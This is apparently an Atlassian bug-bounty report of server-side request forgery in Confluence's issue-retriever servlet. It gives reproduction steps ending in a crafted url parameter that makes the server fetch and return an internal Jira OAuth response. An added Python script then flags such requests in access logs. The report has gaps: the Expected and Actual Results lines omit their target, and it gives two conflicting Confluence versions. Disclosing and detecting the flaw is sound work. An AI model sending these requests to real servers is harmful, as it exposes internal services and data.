SSRF - /plugins/servlet/issue-retriever?columns=&url=XXX

Type atlassian
Modified 2019-06-26T01:17:29


h3. Issue Summary

The following issue was submitted to our bug bounty program.

This endpoint will allow attackers to read the full response of the provided URL.

h3. Environment

* Confluence 6.15.5

h3. Steps to Reproduce

# Set up two Atlassian applications and create an Applink between them. In my case:
{noformat}
http://localhost:8154: Confluence 8.15.4
http://localhost:8820: Jira Software 8.2.0
{noformat}

# Get the Applink Id of Jira Software in Confluence by navigating to:
{noformat}
http://localhost:8154/rest/jiraanywhere/1.0/confluence-view-in-jira/jira-applink-id?jiraUrl=http://localhost:8820
{noformat}
(in my case, it was 24830af1-59ec-3dff-ac70-12e66ebdd6c2)

# Navigate to
{noformat}
http://localhost:8154/plugins/servlet/applinks/oauth/login-dance/authorize?applicationLinkID=24830af1-59ec-3dff-ac70-12e66ebdd6c2
{noformat}
to complete the application linking. Make sure to use your own applink Id.

# As an admin of Confluence, navigate to the following URL:
{noformat}
http://localhost:8154/plugins/servlet/issue-retriever?columns=&url=http://localhost:8820/plugins/servlet/applinks/auth/conf/oauth/outbound/apl-2lo/11111111-2222-3333-4444-555555555555%3fcallback%3dhttps%3a//
{noformat}

h3. Expected Results

A response is not received from

h3. Actual Results

The response from is found in issue-retreiver.xml

h3. Workaround
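
An added log-review example for the request pattern in step 4 (not part of the original report, and not a workaround supplied by Atlassian): it flags issue-retriever requests whose url target lies outside the configured applink origins or itself carries a URL-valued parameter, as callback does above. The access-log format, {{APPLINK_ORIGINS}} and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: origins of the application links configured on this instance.
APPLINK_ORIGINS = {("http", "localhost", 8820)}
SERVLET_PATH = "/plugins/servlet/issue-retriever"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
URL_VALUE_RE = re.compile(r"https?:/", re.IGNORECASE)
DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    """Return (scheme, host, port) for an http(s) URL, else None."""
    try:
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
        if scheme not in DEFAULT_PORTS or not parts.hostname:
            return None
        return (scheme, parts.hostname.lower(), parts.port or DEFAULT_PORTS[scheme])
    except ValueError:  # malformed netloc or port
        return None

def review_line(line):
    """Return findings for one access-log line (empty list if nothing to flag)."""
    m = REQUEST_RE.search(line)
    path, _, query = m.group(1).partition("?") if m else ("", "", "")
    if not path.endswith(SERVLET_PATH):  # endswith tolerates a context path
        return []
    findings = []
    for name, target in parse_qsl(query, keep_blank_values=True):
        if name != "url":
            continue
        if origin(target) not in APPLINK_ORIGINS:
            findings.append("target outside applink origins")
        # Target that itself carries a URL-valued parameter, as callback= does in step 4.
        inner = target.partition("?")[2]
        nested = [k for k, v in parse_qsl(inner, keep_blank_values=True) if URL_VALUE_RE.match(v)]
        if nested:
            findings.append("nested URL parameter: " + ",".join(nested))
    return findings

# Constructed sample access-log lines (not taken from a real system).
SAMPLE_LOG = [
    '127.0.0.1 - admin [26/Jun/2019:01:00:00 +0000] "GET /plugins/servlet/issue-retriever?columns=&url=http://localhost:8820/plugins/servlet/applinks/auth/conf/oauth/outbound/apl-2lo/11111111-2222-3333-4444-555555555555%3fcallback%3dhttps%3a// HTTP/1.1" 200 512',
    '127.0.0.1 - admin [26/Jun/2019:01:00:05 +0000] "GET /plugins/servlet/issue-retriever?columns=&url=http://localhost:8820/sr/search.xml%3fjqlQuery%3dproject%3dDEMO HTTP/1.1" 200 2048',
    '127.0.0.1 - admin [26/Jun/2019:01:00:09 +0000] "GET /plugins/servlet/issue-retriever?columns=&url=http://other-host.example:8080/status HTTP/1.1" 200 97',
    '127.0.0.1 - admin [26/Jun/2019:01:00:12 +0000] "GET /dashboard.action HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(review_line(entry), entry[:70])
```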